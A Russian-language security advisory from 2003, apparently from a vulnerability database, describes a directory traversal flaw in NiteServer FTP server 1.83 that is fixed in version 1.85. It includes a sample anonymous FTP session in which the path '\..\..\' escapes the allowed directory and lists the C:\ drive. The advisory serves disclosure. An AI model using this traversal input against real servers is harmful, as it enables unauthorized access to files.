Доступ к произвольным файлам в FTP сервере NiteServer
| Дата публикации: | 20.01.2003 |
| Всего просмотров: | 1426 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | NiteServer – простой FTp сервер с некоторыми специфическими особенностями. В программе обнаружена возможность обхода каталога несколькими способами. NiteServer не в состоянии фильтровать последовательность "\.." в FTP командах, в результате удаленный атакующий может выйти за пределы разрешенных директорий и получить доступ к произвольным файлам на уязвимой системе. Пример: Connected to 192.168.1.22. 220- Niteserver Version:1.83 220- Author:Thomas Krebs 220- email: turtie@knuut.de 220- Welcome to the Niteserver 220- First Author:Thomas Krebs! 220- 220 User (192.168.1.22:(none)): anonymous 331 User anonymous accepted, send password..... Password: 230 User anonymous accepted, ok come on..... ftp> ls 200 PORT command ok.... 257 "c:/ftpd/data" is working directory...c:\ftpd\data ftp> cd / 250 Directory changed to"c:\ftpd\data" . ftp> cd .. 250 Directory changed to"c:\ftpd\data" . ftp> cd \..\..\ 250 Directory changed to"c:\" . ftp> ls 200 PORT command ok.... 257 "c:/" is working directory...c:\ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT 226 Listing complete. ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec. ftp> bye 221 Goodbye.Уязвимость обнаружена в NITE ftp-server version 1.83 и устранена в 1.85 |
| Ссылки: | Directory Traversal Vulnerabilities Found in NITE FTP Server |